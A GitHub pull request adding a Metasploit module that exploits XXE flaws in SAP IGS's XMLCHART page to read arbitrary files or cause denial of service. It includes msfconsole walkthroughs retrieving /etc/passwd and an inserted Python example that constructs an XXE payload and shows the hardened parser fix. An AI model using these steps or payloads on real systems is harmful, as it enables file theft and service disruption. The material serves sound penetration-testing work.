SAP Internet Graphics Server (IGS) XMLCHART XXE attack (CVE-2018-2392 and CVE-2018-2393) #14163

Merged (13 commits), Oct 7, 2020
Conversation

Vladimir-Ivanov-Git (Contributor) commented Sep 21, 2020

This PR adds in support for exploiting CVE-2018-2392 and CVE-2018-2393, two XXE bugs in SAP Internet Graphics Server (IGS) versions 7.20, 7.20EXT, 7.45, 7.49, 7.53. There are two options for exploitation. The first one is READ, which abuses these two vulnerabilities to read an arbitrary file from the SAP IGS server as the user which started the IGS service, which will typically be the SAP administrator. The second one is DOS, which will exploit the XXE issue to cause a denial of service condition on the targeted SAP IGS server.

Verification

List the steps needed to make sure this thing works

  • Start msfconsole
  • Do: workspace [WORKSPACE]
  • Do: use auxiliary/admin/sap/sap_igs_xmlchart_xxe
  • Do: set RHOSTS [IP]
  • Do: set FILE "/etc/passwd"
  • Do: set action READ
  • Do: check
  • Verify that the check method correctly determines if the target is vulnerable or not.
  • Do: run
  • Verify that the run method runs the check code again and also successfully retrieves the contents of the target file, which in this case will be /etc/passwd.
  • Verify that the exploit still works with other files.
  • Document any issues encountered.
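Worked example of the parser behaviour behind this class of bug, added here as an illustration; it is not code from the PR, the Metasploit module, or SAP. It uses Python's xml.sax/expat because the vulnerable and hardened configurations differ by a single feature flag, which makes the mechanism easy to see. Everything in it is constructed: the <chart>/<title> elements are stand-ins, not the real IGS XMLCHART request format, the "secret" file is a temporary file the script creates, and the file:// URI is derived from it. The DOS action from the PR is not reproduced.

```python
# Added example, not from the PR or the Metasploit module: the same XML
# parser with external general entities resolved (XXE-prone) and with that
# feature off (hardened). <chart>/<title> are stand-ins, not the IGS format.
import io
import os
import tempfile
import xml.sax
from pathlib import Path
from xml.sax import handler


class TextCollector(handler.ContentHandler):
    """Collects character data so any entity expansion becomes visible."""

    def __init__(self):
        super().__init__()
        self.parts = []

    def characters(self, content):
        self.parts.append(content)


def parse_chart(xml_bytes, resolve_external_entities):
    """Parse the document and return all character data it yields.

    resolve_external_entities=True is the XXE-prone configuration: SYSTEM
    entities are fetched and spliced into the document as text. False is
    the hardened setting; the reference is then skipped and yields nothing.
    """
    parser = xml.sax.make_parser()
    parser.setFeature(handler.feature_external_ges, resolve_external_entities)
    collector = TextCollector()
    parser.setContentHandler(collector)
    parser.parse(io.BytesIO(xml_bytes))
    return "".join(collector.parts)


def build_xxe_payload(target_path):
    """Constructed XXE document: declares an external entity that points at
    a local file and references it inside an element."""
    file_uri = Path(target_path).resolve().as_uri()
    return (
        '<?xml version="1.0"?>\n'
        f'<!DOCTYPE chart [ <!ENTITY xxe SYSTEM "{file_uri}"> ]>\n'
        "<chart><title>&xxe;</title></chart>\n"
    ).encode("utf-8")


def demo():
    """Run the payload through both configurations.

    Returns (leaked, hardened): leaked is the file content as the vulnerable
    parser surfaces it, hardened is what the fixed parser yields ("").
    """
    # Constructed stand-in for /etc/passwd; on a real target the readable
    # files are whatever the account running the XML-consuming service can open.
    secret_line = "root:x:0:0:root:/root:/bin/bash\n"
    with tempfile.NamedTemporaryFile("w", suffix=".txt", delete=False) as f:
        f.write(secret_line)
        secret_path = f.name
    try:
        payload = build_xxe_payload(secret_path)
        leaked = parse_chart(payload, resolve_external_entities=True)
        hardened = parse_chart(payload, resolve_external_entities=False)
    finally:
        os.unlink(secret_path)
    return leaked, hardened


if __name__ == "__main__":
    leaked, hardened = demo()
    print("vulnerable parser returned:", repr(leaked))
    print("hardened parser returned:  ", repr(hardened))
```

The point to take from it: the request never contains the file content; the parser fetches it while expanding &xxe; and hands it to the application as ordinary character data, which is why the READ action can return /etc/passwd as the IGS service user. Disabling external general entities (and DTD loading, where the parser supports it) is the fix; in Python the defusedxml package applies that configuration for you. Note also that a file containing raw "<" or "&" is not a well-formed external parsed entity, so a plain SYSTEM entity like this one fails on such files; that limitation is inherent to the technique, not to the example.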

label-actions bot commented Sep 21, 2020

When creating a pull request, please ensure that the default pull request template has been updated with the required details.

label-actions bot commented Sep 21, 2020

Thanks for your pull request! Before this can be merged, we need the following documentation for your module:

@cdelafuente-r7 cdelafuente-r7 added the needs-linting The module needs additional work to pass our automated linting rules label Sep 21, 2020
label-actions bot commented Sep 21, 2020

Thanks for your pull request! Before this pull request can be merged, it must pass the checks of our automated linting tools.

We use Rubocop and msftidy to ensure the quality of our code. This can be ran from the root directory of Metasploit:

rubocop <directory or file>
tools/dev/msftidy.rb <directory or file>

You can automate most of these changes with the -a flag:

rubocop -a <directory or file>

Please update your branch after these have been made, and reach out if you have any problems.

Vladimir-Ivanov-Git (Contributor, author) commented Sep 24, 2020

About

This module implements the SAP Internet Graphics Server (IGS) XXE attack.
An unauthenticated attacker can remotely read files in the server's file system, for example: /etc/passwd
Vulnerable SAP IGS versions: 7.20, 7.20EXT, 7.45, 7.49, 7.53
Research presentation: https://download.ernw-insight.de/troopers/tr18/slides/TR18_SAP_IGS-The-vulnerable-forgotten-component.pdf by @_1ggy Yvan Genuer
CVE-2018-2392
CVE-2018-2393

Verification Steps

  1. Install the module as usual
  2. Start msfconsole
  3. Do: workspace [WORKSPACE]
  4. Do: use auxiliary/admin/sap/sap_igs_xxe
  5. Do: set RHOSTS [IP]
  6. Do: set FILE [remote file name]
  7. Do: set SHOW [true|false]
  8. Do: set action READ
  9. Do: check
  10. Do: run

Options

FILE

File to read from the remote server, example: /etc/passwd

SHOW

true - show remote file content and save in workspace loot
false - do not show remote file content, only save it in workspace loot

URN

Vulnerable SAP IGS URN by default: /XMLCHART

Actions

   Name  Description
   ----  -----------
   READ  Remote file read
   DOS   Denial Of Service

Scenarios

Vulnerable SAP IGS release: 7.45 running on SUSE Linux Enterprise Server for SAP Applications 12 SP1

msf6 > workspace -a SAP_TEST
[*] Added workspace: SAP_TEST
[*] Workspace: SAP_TEST
msf6 > use auxiliary/admin/sap/sap_igs_xxe
msf6 auxiliary(admin/sap/sap_igs_xxe) > set RHOSTS 10.10.10.10
RHOSTS => 10.10.10.10
msf6 auxiliary(admin/sap/sap_igs_xxe) > set FILE /etc/passwd
FILE => /etc/passwd
msf6 auxiliary(admin/sap/sap_igs_xxe) > set action READ
action => READ
msf6 auxiliary(admin/sap/sap_igs_xxe) > set Proxies http:127.0.0.1:8080
Proxies => http:127.0.0.1:8080
msf6 auxiliary(admin/sap/sap_igs_xxe) > options

Module options (auxiliary/admin/sap/sap_igs_xxe):

   Name     Current Setting      Required  Description
   ----     ---------------      --------  -----------
   FILE     /etc/passwd          yes       File to read from the remote server
   Proxies  http:127.0.0.1:8080  no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS   10.10.10.10          yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT    40080                yes       The target port (TCP)
   SHOW     true                 no        Show remote file content
   SSL      false                no        Negotiate SSL/TLS for outgoing connections
   URN      /XMLCHART            no        SAP IGS XMLCHART URN
   VHOST                         no        HTTP server virtual host


Auxiliary action:

   Name  Description
   ----  -----------
   READ  Remote file read


msf6 auxiliary(admin/sap/sap_igs_xxe) > check
[+] 10.10.10.10:40080 - The target is vulnerable. OS info: SUSE Linux Enterprise Server for SAP Applications 12 SP1
msf6 auxiliary(admin/sap/sap_igs_xxe) > run
[*] Running module against 10.10.10.10

[+] File: /etc/passwd content from host: 10.10.10.10
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/bin/bash
daemon:x:2:2:Daemon:/sbin:/bin/bash
lp:x:4:7:Printing daemon:/var/spool/lpd:/bin/bash
mail:x:8:12:Mailer daemon:/var/spool/clientmqueue:/bin/false
news:x:9:13:News system:/etc/news:/bin/bash
uucp:x:10:14:Unix-to-Unix CoPy system:/etc/uucp:/bin/bash
games:x:12:100:Games account:/var/games:/bin/bash
man:x:13:62:Manual pages viewer:/var/cache/man:/bin/bash
wwwrun:x:30:8:WWW daemon apache:/var/lib/wwwrun:/bin/false
ftp:x:40:49:FTP account:/srv/ftp:/bin/bash
nobody:x:65534:65533:nobody:/var/lib/nobody:/bin/bash
messagebus:x:499:499:User for D-Bus:/var/run/dbus:/bin/false
sshd:x:498:498:SSH daemon:/var/lib/sshd:/bin/false
polkitd:x:497:496:User for polkitd:/var/lib/polkit:/sbin/nologin
nscd:x:496:495:User for nscd:/run/nscd:/sbin/nologin
rpc:x:495:65534:user for rpcbind:/var/lib/empty:/sbin/nologin
openslp:x:494:2:openslp daemon:/var/lib/empty:/sbin/nologin
uuidd:x:493:492:User for uuidd:/var/run/uuidd:/bin/bash
usbmux:x:492:65534:usbmuxd daemon:/var/lib/usbmuxd:/sbin/nologin
ntp:x:74:491:NTP daemon:/var/lib/ntp:/bin/false
at:x:25:25:Batch jobs daemon:/var/spool/atjobs:/bin/bash
vnc:x:491:490:user for VNC:/var/lib/empty:/sbin/nologin
rtkit:x:490:489:RealtimeKit:/proc:/bin/false
pulse:x:489:488:PulseAudio daemon:/var/lib/pulseaudio:/sbin/nologin
statd:x:488:65534:NFS statd daemon:/var/lib/nfs:/sbin/nologin
ftpsecure:x:487:65534:Secure FTP User:/var/lib/empty:/bin/false
postfix:x:51:51:Postfix Daemon:/var/spool/postfix:/bin/false
scard:x:486:485:Smart Card Reader:/var/run/pcscd:/usr/sbin/nologin
gdm:x:485:483:Gnome Display Manager daemon:/var/lib/gdm:/bin/false
erpadm:x:1001:1001:SAP System Administrator:/home/erpadm:/bin/csh
sapadm:x:1002:1001:SAP System Administrator:/home/sapadm:/bin/false

[+] File: /etc/passwd saved in: /Users/vladimir/.msf4/loot/20200929135102_SAP_TEST_10.10.10.10_sap.igs.xxe_302025.txt
[*] Auxiliary module execution completed
msf6 auxiliary(admin/sap/sap_igs_xxe) > services
Services
========

host         port   proto  name  state  info
----         ----   -----  ----  -----  ----
10.10.10.10  40080  tcp    http  open   SAP Internet Graphics Server (IGS); OS info: SUSE Linux Enterprise Server for SAP Applications 12 SP1

msf6 auxiliary(admin/sap/sap_igs_xxe) > vulns

Vulnerabilities
===============

Timestamp                Host         Name                                    References
---------                ----         ----                                    ----------
2020-09-29 10:51:01 UTC  10.10.10.10  SAP Internet Graphics Server (IGS) XXE  CVE-2018-2392,CVE-2018-2393,URL-https://download.ernw-insight.de/troopers/tr18/slides/TR18_SAP_IGS-The-vulnerable-forgotten-component.pdf

msf6 auxiliary(admin/sap/sap_igs_xxe) > loot

Loot
====

host         service  type         name         content     info         path
----         -------  ----         ----         -------     ----         ----
10.10.10.10           sap.igs.xxe  /etc/passwd  text/plain  SAP IGS XXE  /Users/vladimir/.msf4/loot/20200929135102_SAP_TEST_10.10.10.10_sap.igs.xxe_302025.txt

Vladimir-Ivanov-Git (Contributor, author): @cdelafuente-r7 add docs #14163 (comment)

@Vladimir-Ivanov-Git Vladimir-Ivanov-Git changed the title This module implements the SAP Internet Graphics Server (IGS) XXE attack SAP Internet Graphics Server (IGS) XXE attack Sep 24, 2020
gwillcox-r7 (Contributor):

About

This module implements the SAP Internet Graphics Server (IGS) XXE attack.
Research presentation: https://download.ernw-insight.de/troopers/tr18/slides/TR18_SAP_IGS-The-vulnerable-forgotten-component.pdf by @_1ggy Yvan Genuer

Verification Steps

  1. Install the module as usual
  2. Start msfconsole
  3. Do: workspace [WORKSPACE]
  4. Do: use auxiliary/admin/sap/sap_igs_xxe
  5. Do: set RHOSTS [IP]
  6. Do: set FILE [remote file name]
  7. Do: set SHOW [true|false]
  8. Do: set action READ
  9. Do: check
  10. Do: run

Options

FILE

Remote file name, example: /etc/passwd

SHOW

true - show remote file content and save in workspace loot
false - do not show remote file content, only save it in workspace loot

URN

Vulnerable SAP IGS URN by default: /XMLCHART

Actions

   Name  Description
   ----  -----------
   READ  Remote file read
   DOS   Denial Of Service

Scenarios

Vulnerable SAP IGS release: 745 running on SUSE Linux Enterprise Server for SAP Applications 12 SP1

msf6 > workspace -a SAP_TEST
[*] Added workspace: SAP_TEST
[*] Workspace: SAP_TEST
msf6 > use auxiliary/admin/sap/sap_igs_xxe
msf6 auxiliary(admin/sap/sap_igs_xxe) > set rhosts 10.10.10.10
rhosts => 10.10.10.10
msf6 auxiliary(admin/sap/sap_igs_xxe) > options

Module options (auxiliary/admin/sap/sap_igs_xxe):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   FILE     /etc/passwd      yes       Remote file name for read
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS   10.10.10.10      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT    40080            yes       The target port (TCP)
   SHOW     true             no        Show remote file content
   SSL      false            no        Use SSL/TLS
   Threads  1                no        Number of threads
   Timeout  10               no        TCP connection timeout
   URN      /XMLCHART        no        SAP IGS XMLCHART URN
   VHOST                     no        HTTP server virtual host


Auxiliary action:

   Name  Description
   ----  -----------
   READ  Remote file read


msf6 auxiliary(admin/sap/sap_igs_xxe) > check
[+] 10.10.10.10:40080 - The target is vulnerable. OS info: SUSE Linux Enterprise Server for SAP Applications 12 SP1
msf6 auxiliary(admin/sap/sap_igs_xxe) > services
Services
========

host         port   proto  name  state  info
----         ----   -----  ----  -----  ----
10.10.10.10  40080  tcp    http  open   SAP Internet Graphics Server (IGS); OS info: SUSE Linux Enterprise Server for SAP Applications 12 SP1

msf6 auxiliary(admin/sap/sap_igs_xxe) > vulns

Vulnerabilities
===============

Timestamp                Host         Name                                    References
---------                ----         ----                                    ----------
2020-09-24 09:02:03 UTC  10.10.10.10  SAP Internet Graphics Server (IGS) XXE  URL-https://download.ernw-insight.de/troopers/tr18/slides/TR18_SAP_IGS-The-vulnerable-forgotten-component.pdf

msf6 auxiliary(admin/sap/sap_igs_xxe) > run
[*] Running module against 10.10.10.10

[+] File: /etc/passwd content from host: 10.10.10.10
bin:x:1:1:bin:/bin:/bin/bash
daemon:x:2:2:Daemon:/sbin:/bin/bash
ftp:x:40:49:FTP account:/srv/ftp:/bin/bash
gdm:x:485:483:Gnome Display Manager daemon:/var/lib/gdm:/bin/false
lp:x:4:7:Printing daemon:/var/spool/lpd:/bin/bash
mail:x:8:12:Mailer daemon:/var/spool/clientmqueue:/bin/false
man:x:13:62:Manual pages viewer:/var/cache/man:/bin/bash
messagebus:x:499:499:User for D-Bus:/var/run/dbus:/bin/false
news:x:9:13:News system:/etc/news:/bin/bash
nobody:x:65534:65533:nobody:/var/lib/nobody:/bin/bash
ntp:x:74:491:NTP daemon:/var/lib/ntp:/bin/false
postfix:x:51:51:Postfix Daemon:/var/spool/postfix:/bin/false
pulse:x:489:488:PulseAudio daemon:/var/lib/pulseaudio:/sbin/nologin
root:x:0:0:root:/root:/bin/bash
sshd:x:498:498:SSH daemon:/var/lib/sshd:/bin/false
statd:x:488:65534:NFS statd daemon:/var/lib/nfs:/sbin/nologin
wwwrun:x:30:8:WWW daemon apache:/var/lib/wwwrun:/bin/false
sapadm:x:1002:79:SAP System Administrator:/home/sapadm:/bin/false
erpadm:x:1001:79:SAP System Administrator:/home/erpadm:/bin/csh

[+] File: /etc/passwd saved in: /Users/vladimir/.msf4/loot/20200924120226_SAP_TEST_10.10.10.10_sap.igs.xxe_595660.txt
[*] Auxiliary module execution completed
msf6 auxiliary(admin/sap/sap_igs_xxe) > loot

Loot
====

host         service  type         name  content     info  path
----         -------  ----         ----  -------     ----  ----
10.10.10.10           sap.igs.xxe        text/plain        /Users/vladimir/.msf4/loot/aac432b86a306458c9e7-20200924120226_SAP_TEST_10.10.10.10_sap.igs.xxe_595660.txt

msf6 auxiliary(admin/sap/sap_igs_xxe) >

All of this information should be moved from this comment into a file at documentation/modules/auxiliary/admin/sap/sap_igs_xxe.md. Before submitting these changes, please also make sure that you run tools/dev/msftidy_docs.rb documentation/modules/auxiliary/admin/sap/sap_igs_xxe.md and fix any of the errors reported.

Additionally, if you could run rubocop -a modules/auxiliary/admin/sap/sap_igs_xxe.rb and upload the module file again after RuboCop applies its automatic changes, this would be much appreciated!

gwillcox-r7 (Contributor) left a review comment:

Made some recommendations based on the code so far, code will likely need a few more rounds of review before it's ready to land. Please let me know if you have any questions or concerns as I know a few of the recommended changes may be a little confusing.

gwillcox-r7 (Contributor) commented on modules/auxiliary/admin/sap/sap_igs_xxe.rb (several earlier review comments on this file were marked as resolved), at:

    end

    def action_dos
A lot of the code for this function seems similar to the code for the check method, which is in turn similar to the code for the action_file_read function. I would look at trying to reduce code reuse throughout your module as it seems a lot of these functions perform nearly identical actions at times.

gwillcox-r7 (Contributor):

@Vladimir-Ivanov-Git Reviewed some of the changes you made, there are a few that seem like they weren't addressed though. I'll edit a few of these issues where I can tomorrow but until then I still need the following info:

  • Root cause of the bug which includes but is not limited to:
    • The affected page on the web server
    • The affected parameter(s) on the web server.
    • Any mitigations the server attempts to put in place to prevent you exploiting this bug.
  • Info on where to get a vulnerable copy of the affected software. Download links, info on the server model etc.
  • Set up instructions on how to set up the vulnerable target. These need to be as detailed as possible. We've had issues in the past going back and forth with contributors on how to get their targets set up correctly and most of the time it was due to a lack of detail on this point, so please put in sufficient detail here. If in doubt, remember that more info is better.
  • Details on whether just /XMLCHART is affected or if there are other pages which could also be used for exploitation.

Vladimir-Ivanov-Git (Contributor, author), quoting the above:

@Vladimir-Ivanov-Git Reviewed some of the changes you made, there are a few that seem like they weren't addressed though. I'll edit a few of these issues where I can tomorrow but until then I still need the following info:

  • Root cause of the bug which includes but is not limited to:

    • The affected page on the web server
    • The affected parameter(s) on the web server.
    • Any mitigations the server attempts to put in place to prevent you exploiting this bug.
  • Info on where to get a vulnerable copy of the affected software. Download links, info on the server model etc.

  • Set up instructions on how to set up the vulnerable target. These need to be as detailed as possible. We've had issues in the past going back and forth with contributors on how to get their targets set up correctly and most of the time it was due to a lack of detail on this point, so please put in sufficient detail here. If in doubt, remember that more info is better.

  • Details on whether just /XMLCHART is affected or if there are other pages which could also be used for exploitation.

6d96e37

Vladimir-Ivanov-Git (Contributor, author):

URN: /XMLCHART is the only page exposed to the XXE attack
Research: https://download.ernw-insight.de/troopers/tr18/slides/TR18_SAP_IGS-The-vulnerable-forgotten-component.pdf

@gwillcox-r7 gwillcox-r7 added docs needs-testing-environment PRs that need community testing and/or vulnerable test targets before they're able to be landed and removed needs-docs needs-linting The module needs additional work to pass our automated linting rules labels Oct 1, 2020
label-actions bot commented Oct 1, 2020

Thanks for your pull request! As part of our landing process, we manually verify that all modules work as expected.

We have been unable to test this module successfully. This may be due to software or hardware requirements we cannot replicate.

To help unblock this pull request, please:

  • Comment with links to documentation on how to set up an environment, and provide exact software version numbers to use
  • Or comment guided steps on how to set up our environment for testing this module
  • Or send pcaps/screenshots/recordings of it working - you can email us msfdev[at]rapid7.com

Once there's a clear path for testing and evaluating this module, we can progress with this further.

gwillcox-r7 (Contributor):

@Vladimir-Ivanov-Git I have tried to get access to the SAP IGS server as a download but it appears that it is paid software and Rapid7 does not have a copy of it in our testing labs. Most likely we will need to receive PCAPs from you showing that this module works as expected unless we are somehow able to obtain a legal copy of the software for testing. Please send these PCAPs to the address listed above.

Additionally this module is still missing setup steps. I have attempted to add some initial setup steps and marked where I had to stop with XXX along with some comments as to why I wasn't able to continue within the documentation. Note that simply linking to external documentation is not desirable as we would prefer our documentation to be self contained.

Please additionally note that within the module I was not able to determine as which user the file read occurs. Is it the user running the SAP IGS server? SYSTEM? Some other user? It would be helpful, given this is essentially an arbitrary file read vulnerability, to know who we are reading the files as, since certain files such as /etc/shadow might not be readable without the right permissions.

I have also made several changes in the meantime to sort out some of the issues described in my earlier reviews. There is still more work to do though and I will be adding another round of reviews in after these issues

@gwillcox-r7 gwillcox-r7 changed the title SAP Internet Graphics Server (IGS) XXE attack SAP Internet Graphics Server (IGS) XMLCHART XXE attack (CVE-2018-2392 and CVE-2018-2393) Oct 1, 2020
gwillcox-r7 (Contributor) left a review comment:

Changes from 0a6f3a7 look good, still reviewing the other commit

gwillcox-r7 (Contributor):

[+] File: /etc/passwd saved in: /Users/vladimir/.msf4/loot/20201006213400_default_172.16.30.29_sap.igs.xmlchart_583380.txt

This output is not from after b080803 was applied: it does not include several changes that were made to the output.

gwillcox-r7 (Contributor):

08f4284 Should fix the issues identified in the last review. The comment at #14163 (comment) still applies though, as does the part about updating the documentation with the new output from the exploit.

Vladimir-Ivanov-Git (Contributor, author) commented Oct 7, 2020, quoting the above:

08f4284 Should fix the issues identified in the last review. The comment at #14163 (comment) still applies though, as does the part about updating the documentation with the new output from the exploit.

Current ltype - sap.igs.xmlchart.xxe
The last 4 bytes - .xxe are cut off, because maximum ltype length is 16 bytes.
https://github.com/rapid7/metasploit-framework/blob/master/lib/msf/core/auxiliary/report.rb#L411

Vladimir-Ivanov-Git (Contributor, author):

[screenshots: loot file name before the ltype cut; loot file name after the ltype cut]

Vladimir-Ivanov-Git (Contributor, author):

After 0c26fd2

msf6 > workspace -a SAP
[*] Added workspace: SAP
[*] Workspace: SAP
msf6 > use auxiliary/admin/sap/sap_igs_xmlchart_xxe
msf6 auxiliary(admin/sap/sap_igs_xmlchart_xxe) > set RHOSTS 172.16.30.29
RHOSTS => 172.16.30.29
msf6 auxiliary(admin/sap/sap_igs_xmlchart_xxe) > set FILE /etc/passwd
FILE => /etc/passwd
msf6 auxiliary(admin/sap/sap_igs_xmlchart_xxe) > set action READ
action => READ
msf6 auxiliary(admin/sap/sap_igs_xmlchart_xxe) > set Proxies http:127.0.0.1:8080
Proxies => http:127.0.0.1:8080
msf6 auxiliary(admin/sap/sap_igs_xmlchart_xxe) > options

Module options (auxiliary/admin/sap/sap_igs_xmlchart_xxe):

   Name     Current Setting      Required  Description
   ----     ---------------      --------  -----------
   FILE     /etc/passwd          no        File to read from the remote server
   Proxies  http:127.0.0.1:8080  no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS   172.16.30.29         yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT    40080                yes       The target port (TCP)
   SSL      false                no        Negotiate SSL/TLS for outgoing connections
   URIPATH  /XMLCHART            yes       Path to the SAP IGS XMLCHART page from the web root
   VHOST                         no        HTTP server virtual host


Auxiliary action:

   Name  Description
   ----  -----------
   READ  Remote file read


msf6 auxiliary(admin/sap/sap_igs_xmlchart_xxe) > check
[+] 172.16.30.29:40080 - The target is vulnerable. 172.16.30.29 running OS: SUSE Linux Enterprise Server for SAP Applications 12 SP1 returned a response indicating that its XMLCHART page is vulnerable to XXE!
msf6 auxiliary(admin/sap/sap_igs_xmlchart_xxe) > run
[*] Running module against 172.16.30.29

[+] File: /etc/passwd saved in: /Users/vladimir/.msf4/loot/20201007130158_SAP_172.16.30.29_igs.xmlchart.xxe_985708.txt
[*] Auxiliary module execution completed
msf6 auxiliary(admin/sap/sap_igs_xmlchart_xxe) > services
Services
========

host          port   proto  name  state  info
----          ----   -----  ----  -----  ----
172.16.30.29  40080  tcp    http  open   SAP Internet Graphics Server (IGS)

msf6 auxiliary(admin/sap/sap_igs_xmlchart_xxe) > vulns

Vulnerabilities
===============

Timestamp                Host          Name                                             References
---------                ----          ----                                             ----------
2020-10-07 10:01:57 UTC  172.16.30.29  SAP Internet Graphics Server (IGS) XMLCHART XXE  CVE-2018-2392,CVE-2018-2393,URL-https://download.ernw-insight.de/troopers/tr18/slides/TR18_SAP_IGS-The-vulnerable-forgotten-component.pdf

msf6 auxiliary(admin/sap/sap_igs_xmlchart_xxe) > loot

Loot
====

host          service  type              name         content     info                  path
----          -------  ----              ----         -------     ----                  ----
172.16.30.29           igs.xmlchart.xxe  /etc/passwd  text/plain  SAP IGS XMLCHART XXE  /Users/vladimir/.msf4/loot/ecd3adc3d2e5036abe2a-20201007130158_SAP_172.16.30.29_igs.xmlchart.xxe_985708.txt

gwillcox-r7 (Contributor) left a review comment:

Last commits look all good, should be good to land this now 👍

gwillcox-r7 (Contributor):

Alright going to do a quick rebase of this module @Vladimir-Ivanov-Git, just so that the commit history is a little easier to see as right now there are a lot of cases where there are multiple commits which are all essentially doing the same thing. Once this is cleaned up (which I will do now) I'll land this in.

gwillcox-r7 (Contributor):

Quick note for the future @Vladimir-Ivanov-Git, but if in future you could make sure your commit messages have useful info about what they change, that would be helpful. It's a little confusing looking at a commit message that just says "Update script", as it doesn't tell me what that commit actually did.

Vladimir-Ivanov-Git and others added 13 commits October 7, 2020 10:03
…lls a bit cleaner, as well as make some of the explanations a bit neater. Also remove duplicate code from a few places
…so remove some excess information that was leading to some potential confusion
…E bugs in SAP in the future. Also update the documentation accordingly.
…e to the documentation to note the renaming of the PATH option to URIPATH. Also update the check method so that it now works correctly and so that other functions return errors appropriately.
…, and to update the return types of send_first_request.
Vladimir-Ivanov-Git (Contributor, author), quoting the above:

Quick note for the future @Vladimir-Ivanov-Git, but if in future you could make sure your commit messages have useful info about what they change, that would be helpful. It's a little confusing looking at a commit message that just says "Update script", as it doesn't tell me what that commit actually did.

My bad

gwillcox-r7 (Contributor), quoting the exchange above:

Quick note for the future @Vladimir-Ivanov-Git, but if in future you could make sure your commit messages have useful info about what they change, that would be helpful. It's a little confusing looking at a commit message that just says "Update script", as it doesn't tell me what that commit actually did.

My bad

No problem fixed it up, all good :)

@gwillcox-r7 gwillcox-r7 merged commit 64cc47d into rapid7:master Oct 7, 2020
@gwillcox-r7 gwillcox-r7 added the rn-modules release notes for new or majorly enhanced modules label Oct 7, 2020
gwillcox-r7 (Contributor) commented Oct 7, 2020

Original Release Notes
A new module for exploiting CVE-2018-2392 and CVE-2018-2393, two XXE vulnerabilities in outdated versions of SAP IGS servers, has now been added into the framework. Users can exploit these vulnerabilities via the new module to read arbitrary files on affected systems as the user who installed the SAP IGS server. Alternatively users can also use these vulnerabilities to conduct a DoS attack against the vulnerable SAP IGS server.

gwillcox-r7 (Contributor):

Thanks for the submission @Vladimir-Ivanov-Git, and congrats on landing your first PR in Metasploit! 🥳

pbarry-r7 (Contributor) commented Oct 14, 2020

Release Notes

New module auxiliary/admin/sap/sap_igs_xmlchart_xxe targets older versions of SAP IGS servers, supporting arbitrary file read and DoS attacks against vulnerable targets (CVE-2018-2392, CVE-2018-2393).
